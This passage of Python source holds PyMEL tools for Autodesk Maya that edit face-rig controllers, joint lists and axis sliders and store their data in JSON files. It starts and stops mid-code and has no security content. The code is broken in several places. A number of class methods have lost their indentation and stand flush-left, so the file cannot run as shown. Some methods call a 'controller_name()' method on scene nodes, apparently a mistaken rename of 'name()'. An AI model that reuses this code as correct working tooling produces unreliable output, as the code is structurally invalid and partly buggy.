                (self.add_joint_btn, 'left', 10),
                (self.add_joint_btn, 'right', 10),
                (self.text_scroll, 'left', 10),
                (self.text_scroll, 'right', 10),
                (self.text_scroll, 'bottom', 10)
            ],
            attachControl=[
                (
                    self.controller_field, 'right', 5,
                    self.select_controller_btn),
                (
                    self.controller_attr_options, 'top', 5,
                    self.controller_field),
                (self.add_joint_btn, 'top', 5, self.controller_attr_options),
                (self.text_scroll, 'top', 5, self.add_joint_btn),
            ],
        )
        pm.setParent("..")  # end of formLayout
        pm.setParent("..")  # end of frameLayout
        pm.formLayout(
            self.main_form,
            edit=True,
            attachForm=[
                (self.frame_layout, 'top', 10),
                (self.frame_layout, 'left', 10),
                (self.frame_layout, 'bottom', 10),
                (self.frame_layout, 'right', 10),
            ],
            attachControl=[
                # (self.controller_field, 'right', 5,
                #  self.select_controller_btn),
            ],
        )
        pm.showWindow("customAttrHelper")
    def _closed_window_cmd(self):
        # Nothing to persist for this tool.
        pass
    def select_item(self):
        """Select in the scene the joints highlighted in the list widget."""
        joint_list = pm.textScrollList(self.text_scroll, q=True, si=True)
        pm.select(joint_list)
        return joint_list
    def select_controller(self):
        """Select in the scene the controller named in the text field."""
        pm.select(
            pm.textFieldButtonGrp(self.controller_field, q=True, text=True)
        )
        return
    def select_radio_item(self):
        """Refresh the joint list for the chosen jointsX/Y/Z attribute."""
        label_array = ['jointsX', 'jointsY', 'jointsZ']
        radio_index = pm.radioButtonGrp(
            "customControllerAttrOptions", q=True, sl=True)
        controller_name = pm.textFieldButtonGrp(
            "customControllerGetter", q=True, text=True)
        select_attr = label_array[radio_index - 1]
        if pm.PyNode(controller_name).hasAttr(select_attr):
            joint_list = str_to_list(
                pm.getAttr("%s.%s" % (controller_name, select_attr)))
            pm.textScrollList(self.text_scroll, e=True, ra=True)
            pm.textScrollList(self.text_scroll, e=True, a=joint_list)
        else:
            pm.textScrollList(self.text_scroll, e=True, ra=True)
    def joint_string_value(self):
        """Store the scene selection as the controller's joint-list attribute.

        Joint names are serialized as a single ``;``-separated string on
        jointsX/Y/Z, matching what str_to_list() parses back.
        """
        index = pm.radioButtonGrp(
            "customControllerAttrOptions", q=True, sl=True)
        controller = pm.textFieldButtonGrp(
            "customControllerGetter", q=True, text=True)
        sel_joints = pm.ls(sl=True)
        name = ""
        for item in sel_joints:
            name = name + item.controller_name() + ";"
        attr_name = ""
        if index == 1:
            attr_name = "jointsX"
        elif index == 2:
            attr_name = "jointsY"
        elif index == 3:
            attr_name = "jointsZ"
        pm.setAttr(("%s.%s" % (controller, attr_name)), name, type="string")
        pm.textScrollList(self.text_scroll, e=True, a=sel_joints)
        return
    def get_custom_controller(self):
        """Load the first selected node as the active controller and
        display its currently chosen joint-list attribute."""
        attr_list = ['jointsX', 'jointsY', 'jointsZ']
        controller_name = pm.ls(sl=True)[0].controller_name()
        pm.textFieldButtonGrp(
            "customControllerGetter",
            e=True,
            text=controller_name)
        # print(controller_name)
        select_index = pm.radioButtonGrp(
            "customControllerAttrOptions", q=True, sl=True)
        select_attr = attr_list[select_index - 1]
        if pm.PyNode(controller_name).hasAttr(select_attr):
            joint_list = str_to_list(
                pm.getAttr("%s.%s" % (controller_name, select_attr)))
            pm.textScrollList(self.text_scroll, e=True, ra=True)
            pm.textScrollList(self.text_scroll, e=True, a=joint_list)
        return
class ChannelBoxWriter(common.Singleton):
    """Window tool that drives controller attributes from saved JSON data.

    Scans a folder of per-controller JSON files (as written by
    ChannelBoxSaver) and builds sliders connected to the matching
    controller attributes in the scene.
    """
    def __init__(self):
        super(ChannelBoxWriter, self).__init__()
        # Folder containing the per-controller JSON files.
        self.json_folder = ''
        # JSON file basenames (without extension) found in json_folder.
        self.json_files = []
        self.initialize()
        self.show()
    def initialize(self):
        """Restore the JSON folder from option variables and rescan it."""
        if pm.optionVar(q='arFaceControllerJsonFolder'):
            self.json_folder = pm.optionVar(
                q='arFaceControllerJsonFolder')
        self.json_files = self.scanning_folder()
        # print self.json_files
    def show(self):
        """Build (or rebuild) the main window and show it."""
        if pm.window("arFaceController", ex=True):
            pm.deleteUI("arFaceController")
        pm.window(
            "arFaceController",
            mb=True,
            cc=lambda *args: self._closed_window_cmd())
        self.menu_list()
        form_layout = pm.formLayout()
        json_layout = self.json_controller_widget()
        pm.formLayout(
            form_layout, edit=True,
            attachForm=[
                (json_layout, 'left', 10),
                (json_layout, 'right', 10),
            ],
            attachControl=[
                # (dict_layout, 'bottom', 5, file_layout),
            ],
        )
        pm.showWindow("arFaceController")
    def menu_list(self):
        """
        Tool menu bar.
        """
        pm.menu(label=u"设置", tearOff=True)
        pm.menuItem(
            label=u"设置Json存放目录",
            c=lambda *args: self.setting_json_folder())
        pm.menuItem(
            label=u"调试模式", cb=False)
    def json_controller_widget(self):
        """Build the JSON-data management frame and return its layout."""
        layout = pm.frameLayout(
            "controllerOptionsLayout",
            label=u"Json数据管理", mw=10, mh=5, bgs=True)
        pm.radioButtonGrp(
            label=u"工作模式",
            numberOfRadioButtons=2,
            cw3=[50, 50, 50],
            sl=1,
            labelArray2=[u'创建', u'测试'])
        self.option_menu_widget()
        # Dynamic per-controller widgets are inserted here.
        self.selected_controller()
        pm.setParent("..")
        return layout
    def option_menu_widget(self):
        """(Re)build the controller option menu from the scanned JSON files."""
        if pm.optionMenuGrp("controllerOptionsWidget", ex=True):
            pm.deleteUI("controllerOptionsWidget")
        pm.optionMenuGrp(
            "controllerOptionsWidget",
            parent="controllerOptionsLayout",
            label=u"Controller",
            cw2=[60, 50],
            adj=2,
            cc=lambda *args: self.selected_controller())
        if len(self.json_files) > 0:
            for json_file in self.json_files:
                pm.menuItem(label=json_file)
            pm.optionMenuGrp("controllerOptionsWidget", e=True, sl=1)
    def setting_json_folder(self):
        """Let the user pick the JSON folder, then rescan and rebuild the UI."""
        json_folder = pm.fileDialog2(
            dialogStyle=2,
            fileFilter="JSON File (*.json);;",
            fileMode=3, okc=u"选择文件夹")
        if json_folder:
            self.json_folder = json_folder[0]
            self.json_files = self.scanning_folder()
            self.option_menu_widget()
            self.selected_controller()
        return
    def scanning_folder(self):
        """Return the basenames of the files found in json_folder."""
        json_list = []
        if self.json_folder != '':
            path_dir = os.listdir(self.json_folder)
            for json_file in path_dir:
                # Take the JSON file's name and strip its extension.
                file_name = os.path.splitext(json_file)[0]
                json_list.append(file_name)
        return json_list
    def selected_controller(self):
        """Rebuild sliders for the controller chosen in the option menu.

        Each slider is connected to the scene controller's attribute of
        the same name, with the slider range taken from the attribute's
        min/max limits.
        """
        if pm.columnLayout("controllerItemLayout", q=True, ex=True):
            pm.deleteUI("controllerItemLayout")
        pm.columnLayout(
            "controllerItemLayout", adj=1, rs=10,
            parent="controllerOptionsLayout")
        index = pm.optionMenuGrp("controllerOptionsWidget", q=True, sl=True)
        json_file_name = self.json_files[index - 1]
        json_file_path = "%s/%s.json" % (self.json_folder, json_file_name)
        if os.path.isfile(json_file_path):
            dict_data = common.read_json(file_path=json_file_path)
            for key in dict_data.keys():
                slider = pm.floatSliderGrp(
                    label=key,
                    field=True,
                    pre=3,
                    cw3=[40, 60, 100],
                    minValue=-1.0,
                    maxValue=1.0)
                pm.connectControl(slider, "%s.%s" % (json_file_name, key))
                min_value = pm.PyNode(json_file_name).attr(key).getMin()
                max_value = pm.PyNode(json_file_name).attr(key).getMax()
                pm.floatSliderGrp(
                    slider, e=True, minValue=min_value, maxValue=max_value)
                slider_joints = dict_data[key].keys()
                pm.textScrollList(a=slider_joints)
        pm.setParent("..")
        return
    def _closed_window_cmd(self):
        """Persist the JSON folder as a Maya option variable."""
        pm.optionVar(
            sv=('arFaceControllerJsonFolder', self.json_folder))
manager_version = 0.2
class FaceController:
    """
    Lightweight value object describing one face controller.

    Fields are populated from a metadata dict via :meth:`from_dict`.
    """
    def __init__(self):
        # Default every field so an instance is safe to inspect (and to
        # str()) before from_dict() has been called — previously only
        # controller_name existed, and the other attributes raised
        # AttributeError until from_dict() ran.
        self.controller_name = ""
        self.controller_bone_name = ""
        self.controller_group_name = ""
        # NOTE: attribute name keeps the historical "postion" typo —
        # other code in this module reads controller_postion_offset.
        self.controller_postion_offset = [0.0, 0.0, 0.0]
        self.controller_axis_control = {}
    def from_dict(self, dict_data):
        """
        Fill this controller's fields from a metadata dict.

        :param dict_data: Dict with keys ``ControllerName``,
            ``ControllerBoneName``, ``ControllerGroupName``,
            ``ControllerPositionOffset`` and ``AxisControl``.
        """
        self.controller_name = dict_data["ControllerName"]
        self.controller_bone_name = dict_data["ControllerBoneName"]
        self.controller_group_name = dict_data["ControllerGroupName"]
        self.controller_postion_offset = dict_data["ControllerPositionOffset"]
        self.controller_axis_control = dict_data["AxisControl"]
    def __str__(self):
        return self.controller_name
class FeatureManager():
    def __init__(self, name):
        """
        :param name: Feature name used as the prefix of every UI control
                     and JSON file this manager owns (e.g. "eye").
        """
        self.name = name
        # Paths filled in by json_location(); empty until then.
        self.control_group_file = ""
        self.control_file = ""
def json_location(self, root_path):
self.control_group_file = os.path.join(root_path, "{}ControlGroup.json".format(self.name))
self.control_file = os.path.join(root_path, "{}Controller.json".format(self.name))
    def __str__(self):
        # A FeatureManager prints as its feature name.
        return self.name
    def custom_widget(self, parent):
        u"""
        Custom face-shaping tab: controller list, controller metadata
        editor and the per-axis control-joint tab area.
        :return: layout
        """
        layout = pm.formLayout("{}FormTabLayout".format(self.name), p=parent)
        controller_list_frame = pm.frameLayout("{}ControllerListFrameLayout".format(self.name),
                                               bgs=True, mh=10, mw=10, p=layout,
                                               label=("{} Controllers".format(self.name).title()))
        pm.textScrollList("{}ControllerListWidget".format(self.name), w=120, h=130,
                          sc=lambda *args: self.select_controller())
        pm.popupMenu()
        # NOTE(review): build_test_proxy is not defined in this class's
        # visible code — confirm it exists before using this menu item.
        pm.menuItem(label=u"创建测试代理体", c=lambda *args: self.build_test_proxy())
        pm.button("{}ControllerBuildBtn".format(self.name), label="New", w=100,
                  c=lambda *args: self.command_new_control())
        pm.setParent(controller_list_frame)
        controller_meta_frame = pm.frameLayout("{}ControllerMetaFrameLayout".format(self.name),
                                               bgs=True, mh=10, mw=10, p=layout,
                                               label=("{} meta".format(self.name).title()))
        pm.radioButtonGrp("{}ControllerSideField".format(self.name),
                          label=u'控制器位置',
                          numberOfRadioButtons=2,
                          labelArray2=['Middle', 'LF And RT'], cw3=[140, 80, 80])
        pm.textFieldGrp("{}ControllerNameField".format(
            self.name), label=u"控制器")
        pm.textFieldGrp("{}ControllerBoneNameField".format(self.name), label=u"控制器挂点骨骼")
        # pm.textFieldGrp("{}ControllerGroupNameField".format(self.name), label=u"控制器组")
        pm.floatFieldGrp("{}ControllerPositionOffsetField".format(self.name),
                         label=u'控制器位置偏移', numberOfFields=3,
                         value1=0.0, value2=0.0, value3=0.0, cw4=[140, 50, 50, 50])
        pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name),
                       label=u'控制器滑竿',
                       numberOfCheckBoxes=3, labelArray3=['XAxis', 'YAxis', 'ZAxis'],
                       cw4=[140, 80, 80, 80])
        pm.button("{}ControllerMetaUpdateBtn".format(self.name),
                  label=u"更新", c=lambda *args: self.update_meta_data())
        pm.setParent(controller_meta_frame)
        joint_list_frame = pm.frameLayout("{}ControlJointListFrameLayout".format(self.name),
                                          bgs=True, mh=10, mw=10, p=layout,
                                          label=("{} control joints".format(self.name).title()))
        pm.tabLayout("{}ControlJointListTabLayout".format(self.name), p=joint_list_frame)
        pm.setParent("..")
        pm.setParent(joint_list_frame)
        pm.formLayout(
            layout, edit=True,
            attachForm=[
                (controller_list_frame, 'top', 10),
                (controller_list_frame, 'left', 10),
                (controller_meta_frame, 'top', 10),
                (controller_meta_frame, 'right', 10),
                (joint_list_frame, 'left', 10),
                (joint_list_frame, 'right', 10),
                (joint_list_frame, 'bottom', 10),
            ],
            attachControl=[
                (controller_meta_frame, 'left', 5, controller_list_frame),
                (joint_list_frame, 'top', 5, controller_meta_frame),
            ])
        pm.setParent("..")
        self.init_data()
        return layout
    def axis_control_joints_widget(self, parent="", axis=""):
        """Build one axis tab: a joint list plus Max/Min update buttons.

        :param parent: Tab layout the widget is parented to.
        :param axis: Axis tab name, e.g. ``"control_X"``.
        :return: The tab's form layout.
        """
        layout = pm.formLayout("{}Control{}JointFormLayout".format(self.name, axis), p=parent)
        joint_list_frame = pm.frameLayout(
            "{}Control{}JointListFrameLayout".format(self.name, axis), label="Joint List", p=layout)
        # print("{}Control{}JointListWidget".format(self.name, axis))
        pm.textScrollList("{}Control{}JointListWidget".format(self.name, axis), w=120)
        pm.popupMenu()
        pm.menuItem(label=u"添加骨骼", c=lambda *args: self.add_axis_joints())
        pm.setParent(joint_list_frame)
        joint_meta_frame = pm.frameLayout(
            "{}Control{}JointMetaFrameWidget".format(self.name, axis), label="Joint Meta", p=layout)
        pm.button(label=u"Update Max", c=lambda *args: self.update_joints_meta(value="Max"))
        pm.button(label=u"Update Min", c=lambda *args: self.update_joints_meta(value="Min"))
        pm.setParent("..")
        pm.formLayout(layout, edit=True,
                      attachForm=[
                          (joint_list_frame, 'top', 10),
                          (joint_list_frame, 'left', 10),
                          (joint_list_frame, 'bottom', 10),
                          (joint_meta_frame, 'top', 10),
                          (joint_meta_frame, 'right', 10),
                          (joint_meta_frame, 'bottom', 10),
                      ],
                      attachControl=[
                          (joint_meta_frame, 'left', 5, joint_list_frame),
                      ])
        pm.setParent(layout)
        return layout
    def add_axis_joints(self, value="default"):
        """Add the scene-selected joints to the active axis tab.

        Each new joint gets a default BoneRange record (identity Max/Min)
        appended to the current controller's ControlGroup entry, and the
        control-group JSON is rewritten.

        :param value: Unused; kept for signature compatibility.
        """
        tabs = pm.tabLayout("{}ControlJointListTabLayout".format(
            self.name), q=True, tl=True)
        select_tab_index = pm.tabLayout(
            "{}ControlJointListTabLayout".format(self.name), q=True, sti=True)
        current_tab = (tabs[select_tab_index - 1])
        current_controller = pm.textScrollList(
            "{}ControllerListWidget".format(self.name), q=True, si=True)[0]
        select_joint = pm.ls(sl=True)
        for index in range(0, len(self.control_group_data[current_controller]["ControlGroup"])):
            if current_tab in self.control_group_data[current_controller]["ControlGroup"][index]["GroupName"]:
                bone_range = self.control_group_data[current_controller]["ControlGroup"][index]["BoneRange"]
                for joint in select_joint:
                    # Only add joints not already listed in this tab.
                    if joint not in pm.textScrollList(
                            "{}Control{}JointListWidget".format(self.name, current_tab), q=True, ai=True):
                        pm.textScrollList("{}Control{}JointListWidget".format(
                            self.name, current_tab), e=True, a=joint)
                        joint_data = {}
                        joint_data["BoneName"] = joint.name()
                        joint_data["Max"] = [0, 0, 0, 0, 0, 0, 1, 1, 1]
                        joint_data["Min"] = [0, 0, 0, 0, 0, 0, 1, 1, 1]
                        bone_range.append(joint_data)
                self.control_group_data[current_controller]["ControlGroup"][index]["BoneRange"] = bone_range
        common.write_json(self.control_group_data, self.control_group_file)
        return
    def update_joints_meta(self, value):
        """Sample the current pose into the active tab's Max or Min data.

        For every BoneRange entry of the active axis tab, reads the
        channel-box values of each bone's parent transform and stores them
        as that entry's "Max" or "Min", then rewrites the control-group
        JSON file.

        :param value: Either ``"Max"`` or ``"Min"`` — which extreme to
                      overwrite.
        """
        tabs = pm.tabLayout("{}ControlJointListTabLayout".format(
            self.name), q=True, tl=True)
        select_tab_index = pm.tabLayout(
            "{}ControlJointListTabLayout".format(self.name), q=True, sti=True)
        current_tab = (tabs[select_tab_index - 1])
        current_controller = pm.textScrollList(
            "{}ControllerListWidget".format(self.name), q=True, si=True)[0]
        control_group = self.control_group_data[current_controller]["ControlGroup"]
        for index in range(0, len(control_group)):
            # Find the dict inside ControlGroup matching the active tab.
            if current_tab in control_group[index]["GroupName"]:
                current_axis_data = control_group[index]["BoneRange"]
                for axis_data in current_axis_data:
                    bone_name = axis_data["BoneName"]
                    # The sampled transform is the bone's PARENT node —
                    # presumably the offset group that carries the pose.
                    if value == "Max":
                        axis_data["Max"] = self.joint_cb_list(pm.PyNode(bone_name).getParent())
                    elif value == "Min":
                        axis_data["Min"] = self.joint_cb_list(pm.PyNode(bone_name).getParent())
        common.write_json(self.control_group_data, self.control_group_file)
        return
    def joint_cb_list(self, jnt, pre=5):
        """
        Channel-box values of a joint.

        Lists the joint's channel-box attribute values, each rounded to
        *pre* decimal places. Translate values are scaled down 100x
        (multiplied by 0.01) to bridge the unit/scale difference between
        Maya and Unity when the FBX data is consumed on the engine side.

        :param jnt: Name of the target joint.
        :param pre: Number of decimal places to keep.
        :return: [tx, ty, tz, rx, ry, rz, sx, sy, sz]
        """
        jnt_value = [
            round(pm.PyNode(jnt).translateX.get() * 0.01, pre),
            round(pm.PyNode(jnt).translateY.get() * 0.01, pre),
            round(pm.PyNode(jnt).translateZ.get() * 0.01, pre),
            round(pm.PyNode(jnt).rotateX.get(), pre),
            round(pm.PyNode(jnt).rotateY.get(), pre),
            round(pm.PyNode(jnt).rotateZ.get(), pre),
            round(pm.PyNode(jnt).scaleX.get(), pre),
            round(pm.PyNode(jnt).scaleY.get(), pre),
            round(pm.PyNode(jnt).scaleZ.get(), pre),
        ]
        return jnt_value
    def init_data(self):
        """Reload both JSON files and repopulate the controller list.

        Selects the first controller (if any) and rebuilds the per-axis
        joint tabs for it.
        """
        pm.textScrollList("{}ControllerListWidget".format(self.name), e=True, ra=True)
        self.control_group_data = common.read_json(self.control_group_file)
        self.control_data = common.read_json(self.control_file)
        self.controller_list = self.control_data["{}Controller".format(self.name)]
        if len(self.controller_list) > 0:
            for controller in self.controller_list:
                control = FaceController()
                control.from_dict(controller)
                pm.textScrollList("{}ControllerListWidget".format(self.name), e=True,
                                  a=control.controller_name)
            pm.textScrollList("{}ControllerListWidget".format(self.name), e=True, sii=1)
            select_controller_index = self.select_controller()
            self.init_control_joints_frmae_data(select_controller_index)
        return
    def init_control_joints_frmae_data(self, select_controller_index):
        """Rebuild the per-axis joint tabs for the given controller.

        (Method name keeps the historical "frmae" typo — sibling methods
        call it by this name.)

        :param select_controller_index: Index into self.controller_list.
        """
        axis_joint_tabs = self.controller_list[select_controller_index]["AxisControl"].values()
        for tab in axis_joint_tabs:
            # Empty string means this axis has no slider configured.
            if not tab == "":
                # print(tab)
                layout = "{}Control{}JointFormLayout".format(self.name, tab)
                if pm.formLayout(layout, q=True, ex=True):
                    pm.deleteUI(layout)
                # if tab
                axis_joint_tab = self.axis_control_joints_widget(
                    parent="{}ControlJointListTabLayout".format(self.name), axis=tab)
                pm.tabLayout("{}ControlJointListTabLayout".format(self.name), edit=True,
                             tabLabel=((axis_joint_tab, tab)))
                controller_name = pm.textFieldGrp(
                    "{}ControllerNameField".format(self.name), q=True, text=True)
                all_bone_range = self.control_group_data[controller_name]["ControlGroup"]
                for bone_range in all_bone_range:
                    if tab in bone_range["GroupName"]:
                        for bone_dict in bone_range["BoneRange"]:
                            bone_name = bone_dict["BoneName"]
                            text_scroll_list = "{}Control{}JointListWidget".format(self.name, tab)
                            if bone_name not in pm.textScrollList(text_scroll_list, q=True, ai=True):
                                pm.textScrollList(text_scroll_list, e=True, a=bone_name)
def command_new_control(self):
if self.build_control():
self.init_data()
return
def build_control(self):
u"""创建新的控制器
:return:
"""
default_control_data = {
"ControllerPositionOffset": [0.0, 0.0, 0.0],
"ControllerGroupName": "{}ControlGroup".format(self.name),
"ControllerBoneName": "",
"AxisControl": {
"ZAxis": "",
"XAxis": "",
"YAxis": ""
},
"ControllerName": "control"
}
self.control_data['{}Controller'.format(
self.name)].append(default_control_data)
common.write_json(self.control_data, self.control_file)
default_control_joint_group = []
default_control_joint_group.append({
"BoneRange": [],
"GroupName": "control_X"
})
default_control_joint_group.append({
"BoneRange": [],
"GroupName": "control_Y"
})
default_control_joint_group.append({
"BoneRange": [],
"GroupName": "control_Z"
})
default_control_group_data = {
"ControlGroup": default_control_joint_group,
"GroupName": "{}ControlGroup".format(self.name),
"shapeType": "control"
}
self.control_group_data["control"] = default_control_group_data
common.write_json(self.control_group_data, self.control_group_file)
return True
    def select_controller(self):
        u"""Callback for picking a controller in the controller scroll list.

        Reloads the metadata frame with the chosen controller's data and
        rebuilds its per-axis joint tabs.

        :return: zero-based index of the selected controller.
        """
        # sii is 1-based; controller_list is 0-based.
        select_index = pm.textScrollList(
            "{}ControllerListWidget".format(self.name), q=True, sii=True)[0]
        controller_data = self.get_controller_meta_data(select_index - 1)
        self.clean_meta_data_frame()
        self.retrieve_meta_data(controller_data)
        # pm.textScrollList("{}ControllerListWidget".format(self.name), e=True, ra=True)
        # NOTE(review): select_controller is queried but never used below —
        # looks like debugging leftovers, same as the commented block under it.
        select_controller = pm.textScrollList(
            "{}ControllerListWidget".format(self.name), q=True, si=True)[0]
        # for tab_layout in pm.tabLayout("{}ControlJointListTabLayout".format(self.name), q=True, tl=True):
        #     pm.deleteUI(tab_layout)
        #     print(tab_layout)
        print(pm.tabLayout("{}ControlJointListTabLayout".format(self.name), q=True, tl=True))
        self.init_control_joints_frmae_data(select_index - 1)
        # select_controller_index = select_index - 1
        # axis_joint_tabs = self.controller_list[select_controller_index]["AxisControl"].values()
        # for tab in axis_joint_tabs:
        #     if not tab == "":
        #         # print(tab)
        #         layout = "{}Control{}JointFormLayout".format(self.name, tab)
        #         # if pm.formLayout(layout, q=True, ex=True):
        #         #     pm.deleteUI(layout)
        # self.init_data()
        return select_index - 1
def get_controller_meta_data(self, controller_index):
return self.controller_list[controller_index]
def clean_meta_data_frame(self):
pm.textFieldGrp("{}ControllerNameField".format(
self.name), e=True, text="")
pm.textFieldGrp("{}ControllerBoneNameField".format(
self.name), e=True, text="")
# pm.textFieldGrp("{}ControllerGroupNameField".format(self.name), e=True, text="")
pm.floatFieldGrp("{}ControllerPositionOffsetField".format(self.name), e=True,
value1=0.0, value2=0.0, value3=0.0)
pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), e=True,
value1=False, value2=False, value3=False)
return
    def retrieve_meta_data(self, data):
        u"""Fill the metadata frame widgets from a controller data dict.

        :param data: controller metadata dict holding ControllerName,
            ControllerBoneName, ControllerPositionOffset and AxisControl.
        """
        # NOTE(review): asymmetric side test — "_LF" carries an underscore
        # while "RT" does not; confirm whether "_RT" was intended.
        if "_LF" in data["ControllerName"] or "RT" in data["ControllerName"]:
            pm.radioButtonGrp("{}ControllerSideField".format(
                self.name), e=True, sl=2)
        else:
            pm.radioButtonGrp("{}ControllerSideField".format(
                self.name), e=True, sl=1)
        pm.textFieldGrp("{}ControllerNameField".format(
            self.name), e=True, text=data["ControllerName"])
        pm.textFieldGrp("{}ControllerBoneNameField".format(
            self.name), e=True, text=data["ControllerBoneName"])
        # pm.textFieldGrp("{}ControllerGroupNameField".format(self.name), e=True, text=data["ControllerGroupName"])
        pm.floatFieldGrp("{}ControllerPositionOffsetField".format(self.name), e=True,
                         value1=data["ControllerPositionOffset"][0],
                         value2=data["ControllerPositionOffset"][1],
                         value3=data["ControllerPositionOffset"][2])
        # A non-empty axis entry means that slider axis is enabled.
        axis_control_check_grp = data["AxisControl"]
        if axis_control_check_grp["XAxis"] == "":
            axis_x = False
        else:
            axis_x = True
        if axis_control_check_grp["YAxis"] == "":
            axis_y = False
        else:
            axis_y = True
        if axis_control_check_grp["ZAxis"] == "":
            axis_z = False
        else:
            axis_z = True
        pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), e=True,
                       value1=axis_x, value2=axis_y, value3=axis_z)
        return
def update_meta_data(self):
U""" 更新元数据
:return: True
"""
meta_data = {}
controller_name = pm.textFieldGrp(
"{}ControllerNameField".format(self.name), q=True, text=True)
meta_data["ControllerName"] = controller_name
meta_data["ControllerBoneName"] = pm.textFieldGrp(
"{}ControllerBoneNameField".format(self.name), q=True, text=True)
meta_data["ControllerGroupName"] = "{}ControlGroup".format(self.name)
meta_data["ControllerPositionOffset"] = pm.floatFieldGrp(
"{}ControllerPositionOffsetField".format(self.name), q=True, value=True)
meta_data["AxisControl"] = {}
if pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), q=True, v1=True):
meta_data["AxisControl"]["XAxis"] = "{}_X".format(controller_name)
else:
meta_data["AxisControl"]["XAxis"] = ""
if pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), q=True, v2=True):
meta_data["AxisControl"]["YAxis"] = "{}_Y".format(controller_name)
else:
meta_data["AxisControl"]["YAxis"] = ""
if pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), q=True, v3=True):
meta_data["AxisControl"]["ZAxis"] = "{}_Z".format(controller_name)
else:
meta_data["AxisControl"]["ZAxis"] = ""
select_index = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, sii=True)[0]
select_control = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, si=True)[0]
self.controller_list[select_index - 1] = meta_data
# print(select_control)
# print(self.control_group_data)
control_data = self.control_group_data[select_control]
control_data["shapeType"] = controller_name
control_data["GroupName"] = "{}ControlGroup".format(self.name)
current_controller = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, si=True)[0]
for control_group in control_data["ControlGroup"]:
control_group["GroupName"] = control_group["GroupName"].replace(
current_controller, controller_name)
del self.control_group_data[select_control]
self.control_group_data[controller_name] = control_data
# print(self.control_group_data)
if (common.write_json(self.control_data, self.control_file) and
common.write_json(self.control_group_data, self.control_group_file)):
self.clean_meta_data_frame()
all_tabs = pm.tabLayout(
"{}ControlJointListTabLayout".format(self.name), q=True, ca=True)
if all_tabs is not None:
if len(all_tabs) > 1:
for tab in all_tabs:
pm.deleteUI(tab)
self.init_data()
return True
def build_test_proxy(self):
# selected_tab = self.current_select_tab("jsonManagerMainTabLayout")
selected_tab = self.name
selected_controller = pm.textScrollList("{}ControllerListWidget".format(self.name), q=True, si=True)[0]
print(self.name)
print(selected_controller)
def current_select_tab(self, tab_object):
tabs = pm.tabLayout(tab_object, q=True, tl=True)
select_tab_index = pm.tabLayout(tab_object, q=True, sti=True)
current_tab = (tabs[select_tab_index - 1])
return current_tab
class JsonManager(common.Singleton):
"""
Json数据文件管理工具
"""
    def __init__(self):
        u"""Build the json manager window and load persisted settings."""
        super(JsonManager, self).__init__()
        # Root folder holding one sub-folder per feature module.
        self.json_folder = ''
        # Names of the module sub-folders found under json_folder.
        self.module_sections = []
        # Controller metadata rows gathered from the UI (list of dicts).
        self.dict_data = list()
        # Per-controller bone-range detail data keyed by controller name.
        self.detail_data = dict()
        self.controller = {}
        self.controller_detail = {}
        self.current_tab_index = 1
        # Folders storing legacy-version json files, one per face region.
        self.brow_file_folder = ""
        self.eye_file_folder = ""
        self.nose_file_folder = ""
        self.mouth_file_folder = ""
        self.face_file_folder = ""
        self.show()
        self.initialize()
        # self.selected_controller()
    def show(self):
        u"""Show the tool window.

        Deletes any existing window instance first, then builds the config
        frame (storage path / new module fields) above the tabbed work frame.

        :return: window
        """
        if pm.window("jsonManagerUI", ex=True):
            pm.deleteUI("jsonManagerUI")
        pm.window("jsonManagerUI", t=u"角色脸部特征编辑器 %s" % manager_version, mb=True,
                  cc=lambda *args: self._closed_window_cmd())
        # self.menu_list()
        form_layout = pm.formLayout()
        # Config panel: storage path and new-module fields.
        config_frame = pm.frameLayout(
            p=form_layout, label=u"配置面板", mw=5, mh=5, bgs=True, cll=True, cl=False)
        pm.textFieldButtonGrp("XDFaceEditDataStoreField", label=u"存储路径", bl=u"设置", adj=2, cw3=[60, 100, 40],
                              bc=lambda *args: self.setting_json_folder())
        pm.textFieldButtonGrp("XDFaceEditNewModuleField", label=u"特征模块", bl=u"新建", adj=2, cw3=[60, 100, 40],
                              bc=lambda *args: self.command_new_module())
        pm.setParent(config_frame)
        # Work panel: one tab per feature module (filled by init_module_data).
        work_frame = pm.frameLayout(
            p=form_layout, label=u"工作面板", mw=5, mh=5, bgs=True, cll=True, cl=False)
        self.main_tab = pm.tabLayout(
            "jsonManagerMainTabLayout", innerMarginWidth=5, innerMarginHeight=5)
        pm.setParent(self.main_tab)
        pm.setParent(work_frame)
        pm.formLayout(
            form_layout, edit=True,
            attachForm=[
                (config_frame, 'top', 10),
                (config_frame, 'left', 10),
                (config_frame, 'right', 10),
                (work_frame, 'left', 10),
                (work_frame, 'right', 10),
                (work_frame, 'bottom', 10),
            ],
            attachControl=[
                (work_frame, 'top', 5, config_frame),
            ])
        pm.setParent(form_layout)
        pm.showWindow("jsonManagerUI")
    def menu_list(self):
        u"""Build the tool menu bar.

        Note: the only call site in show() is commented out, so this menu is
        currently unused.

        :return: None
        """
        pm.menu(label=u"设置", tearOff=True)
        pm.menuItem(
            label=u"设置Json存放目录",
            c=lambda *args: self.setting_json_folder())
        pm.menuItem(
            label=u"调试模式", cb=False)
        return
    def custom_tab(self):
        """
        Custom face-shaping tab of the tab bar.

        Builds a module option menu plus a three-tab work area
        (controllers / affected bones / test).
        :return: layout
        """
        layout = pm.formLayout("customFormTab")
        option_menu = self.option_menu_widget(parent_widget=layout)
        add_module_btn = pm.button(
            label=u"增加模块",
            c=lambda *args: self.add_module())
        tab_layout = pm.tabLayout(
            innerMarginWidth=5, innerMarginHeight=5)
        # --- tab 1: controller list ---
        controller_list_layout = pm.formLayout()
        add_controller_btn = pm.button(
            label=u"增加控制器",
            c=lambda *args: self.add_controller())
        add_controller_detail_btn = pm.button(
            label=u"增加控制器细节",
            c=lambda *args: self.add_control_detail_widget())
        pm.scrollLayout(
            "controllerListLayout", height=400)
        pm.setParent("..")
        save_data_btn = pm.button(
            "saveDataBtn",
            label=u"保存数据",
            c=lambda *args: self.save_custom_data())
        pm.formLayout(
            controller_list_layout, edit=True,
            attachForm=[
                (add_controller_btn, 'top', 10),
                (add_controller_btn, 'left', 10),
                (add_controller_detail_btn, 'top', 10),
                ("controllerListLayout", 'left', 10),
                ("controllerListLayout", 'right', 10),
                (save_data_btn, 'left', 10),
